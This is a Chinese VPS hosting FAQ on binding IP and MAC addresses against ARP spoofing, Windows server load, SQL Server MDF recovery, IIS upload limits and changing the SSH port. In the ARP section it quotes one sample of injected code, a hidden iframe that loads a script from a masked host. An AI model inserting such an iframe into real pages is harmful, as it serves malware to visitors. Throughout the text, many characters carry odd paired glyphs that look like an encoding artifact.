VPS常見(jiàn)問(wèn)題解答三—宇塵網(wǎng)絡(luò)解答linux系統(tǒng)VPS常見(jiàn)問(wèn)題解答

十一、Linux系統(tǒng)VPS綁定IP和MAC地址

一、ARP欺騙病毒，主要表現(xiàn)為：
中病毒的機(jī)器不僅影響自身，同時(shí)也會(huì)影響同網(wǎng)段的其它機(jī)器，將其它機(jī)器的HTTP數(shù)據(jù)包里加入病毒代碼。

代碼例子如：
<html><iframe src=http://xxx.***.com/lsj.js width=0 height=0></iframe>
這種病毒危害非常大！即使你機(jī)器的安全性做得很好，可是沒(méi)辦法保證同網(wǎng)段的其它機(jī)器安全沒(méi)有問(wèn)題！
解決辦法：在網(wǎng)關(guān)和本機(jī)上雙向綁定IP和MAC地址，以防止ARP欺騙。

二、綁定
1、網(wǎng)關(guān)上已經(jīng)對(duì)下面所帶的機(jī)器作了綁定。網(wǎng)關(guān)IP：192.168.0.1　MAC：00:02:03:18:08:00
2、要進(jìn)行綁定的Unix主機(jī)IP：192.168.0.2　MAC：00:04:61:9D:8B:02

三、綁定步驟
1、先使用arp和arp -a查看一下當(dāng)前ARP緩存列表
[root@ftp]# arp
Address                  HWtype  HWaddress           Flags Mask            Iface
192.168.0.145            ether   00:13:20:E9:11:04   C                     eth0
192.168.0.1              ether   00:02:03:18:08:00   C                     eth0

說(shuō)明：
Address：主機(jī)的IP地址
Hwtype：主機(jī)的硬件類型
Hwaddress：主機(jī)的硬件地址
Flags Mask：記錄標(biāo)志，”C”表示arp高速緩存中的條目，”M”表示靜態(tài)的arp條目。

[root@ftp]# arp -a
 (192.168.0.145) at 00:13:20:E9:11:04 [ether] on eth0
 (192.168.0.1) at 00:02:03:18:08:00 [ether] on eth0

2、新建一個(gè)靜態(tài)的mac–>ip對(duì)應(yīng)表文件：ip-mac，將要綁定的IP和MAC地下寫(xiě)入此文件，格式為 ip mac

[root@ftp]# echo ’192.168.0.1 00:02:03:18:08:00 ‘ > /etc/ip-mac
[root@ftp]# more /etc/ip-mac
192.168.0.1 00:02:03:18:08:00

3、設(shè)置開(kāi)機(jī)自動(dòng)綁定
[root@ftp]# echo ‘a(chǎn)rp -f /etc/ip-mac ‘ >> /etc/rc.d/rc.local

4、手動(dòng)執(zhí)行一下綁定
[root@ftp]# arp -f /etc/ip-mac

5、確認(rèn)綁定是否成功
[root@ftp]# arp
Address                  HWtype  HWaddress           Flags Mask            Iface
192.168.0.145            ether   00:13:20:E9:11:04   C                     eth0
192.168.0.1              ether   00:02:03:18:08:00   CM                    eth0

[root@ftp]# arp -a
 (192.168.0.145) at 00:02:B3:A7:85:48 [ether] on eth0
 (192.168.0.1) at 00:02:03:18:08:00 [ether] PERM on eth0

從綁定前后的ARP緩存列表中，可以看到網(wǎng)關(guān)（192.168.0.1）的記錄標(biāo)志已經(jīng)改變，說(shuō)明綁定成功。

十二、windows服務(wù)器耗資源問(wèn)題分析及處理意見(jiàn)

1、調(diào)用Access程序問(wèn)題（最常見(jiàn)）
原因：access數(shù)據(jù)庫(kù)大小超過(guò)30M，頻繁調(diào)用時(shí)耗用系統(tǒng)資源。
解決方法：將數(shù)據(jù)庫(kù)大小壓縮到30M以內(nèi)，或者升級(jí)到SQLSERVER數(shù)據(jù)庫(kù)。sqlserver是基于客戶/服務(wù)器結(jié)構(gòu)，這意味著服務(wù)器不用再執(zhí)行客戶端的任務(wù)，而access并不是基于客戶/服務(wù)器結(jié)構(gòu)，除了處理數(shù)據(jù)庫(kù)任務(wù)外，其還必須在各個(gè)客戶端活動(dòng)間劃分處理器時(shí)間，因此也會(huì)造成系統(tǒng)負(fù)載非常大，嚴(yán)重時(shí)還會(huì)導(dǎo)致ASP進(jìn)程死鎖，影響所有用戶訪問(wèn)ASP頁(yè)面。
2、Asp,Perl,cgi,SqlServer程序問(wèn)題
原因：程序BUG導(dǎo)致
解決方法：
（1）注意優(yōu)化程序，在處理循環(huán)、跳轉(zhuǎn)等語(yǔ)句時(shí)尤其小心，注意釋放資源。
（2）優(yōu)化數(shù)據(jù)庫(kù)，避免使用全部查詢(select * 之類)。
（3）對(duì)于網(wǎng)上的免費(fèi)程序，不能拿來(lái)就用，需要測(cè)試其性能及安全問(wèn)題，尤其是計(jì)算器、論壇程序。

十三、VPS服務(wù)器可以自行禁用網(wǎng)卡么?

VPS服務(wù)器的網(wǎng)卡信息不可隨意修改，更不可自行禁用網(wǎng)卡，也不可自行的修改IP地址等，進(jìn)行任何一種修改將會(huì)出現(xiàn)網(wǎng)絡(luò)中斷的情況發(fā)生。

十四、怎樣從MDF文件恢復(fù)Sql Server2000數(shù)據(jù)庫(kù)？

1.新建同名數(shù)據(jù)庫(kù)。
2.刪除其日志文件renwen_Data.LDF,不刪除后邊的過(guò)程執(zhí)行通不過(guò)。
3.把renwen數(shù)據(jù)設(shè)置為脫機(jī)。
4.在查詢分析器中以超級(jí)用戶登入，執(zhí)行以下存儲(chǔ)過(guò)程，必須以超級(jí)用戶登入，這是系統(tǒng)級(jí)存儲(chǔ)過(guò)程。
EXEC sp_detach_db @dbname = ‘renwen’
EXEC sp_attach_single_file_db @dbname = ‘renwen’, @physname = ‘E:\WebDemo\renwen_Data.MDF’
5.把test數(shù)據(jù)設(shè)置為聯(lián)機(jī)。
6.刷新數(shù)據(jù)庫(kù)，表出來(lái)了，數(shù)據(jù)完好。

十五、VPS里邊的Administrator這個(gè)用戶可以刪除嗎？

在VPS服務(wù)器上，您可以對(duì)默認(rèn)的Administrator用戶進(jìn)行改名、禁用操作，但是不能刪除這個(gè)默認(rèn)用戶。

遠(yuǎn)程桌面登陸到服務(wù)器，右鍵我的電腦——管理——本地用戶和組——用戶，右鍵單擊Administrator即可對(duì)其進(jìn)行修改或者禁用。

十六、windows服務(wù)器無(wú)組件上傳200K限制處理？

很多VPS用戶使用的操作系統(tǒng)為 windows server 2003，其內(nèi)置的iis6對(duì)無(wú)組件上傳存在200K的大小限制，如果您需要上傳更大的文件，可以按照如下方法修改：
進(jìn)入目錄并用記事本打開(kāi)此文件：C:\WINDOWS\system32\inetsrv\MetaBase.xml
找到此字段：AspMaxRequestEntityAllowed
此字段默認(rèn)值設(shè)置為“204800”，可以將此值修改為需要的數(shù)值。
請(qǐng)注意，如果修改時(shí)提示失敗，請(qǐng)先在“管理”－>“服務(wù)”中將“iis admin service服務(wù)”關(guān)閉后再修改即可。

十七、linux修改SSH遠(yuǎn)程連接端口？

將SSH終端服務(wù)的端口由22修改為別的端口以防攻擊黑客直接猜解您的服務(wù)器密碼
首先修改配置文件
vi /etc/ssh/sshd_config
找到#Port 22一段，這里是標(biāo)識(shí)默認(rèn)使用22端口，修改為如下：
Port 22
Port 50000
然后保存退出
執(zhí)行/etc/init.d/sshd restart
這樣SSH端口將同時(shí)工作與22和50000上。
現(xiàn)在編輯防火墻配置：vi /etc/sysconfig/iptables
啟用50000端口。
執(zhí)行/etc/init.d/iptables restart
現(xiàn)在請(qǐng)使用ssh工具連接50000端口，來(lái)測(cè)試是否成功。
如果連接成功了，則再次編輯sshd_config的設(shè)置，將里邊的Port22刪除，即可。
之所以先設(shè)置成兩個(gè)端口，測(cè)試成功后再關(guān)閉一個(gè)端口，是為了方式在修改conf的過(guò)程中，萬(wàn)一出現(xiàn)掉線、斷網(wǎng)、誤操作等未知情況時(shí)候，還能通過(guò)另外一個(gè)端口連接上去調(diào)試，以免發(fā)生連接不上帶來(lái)更多的麻煩。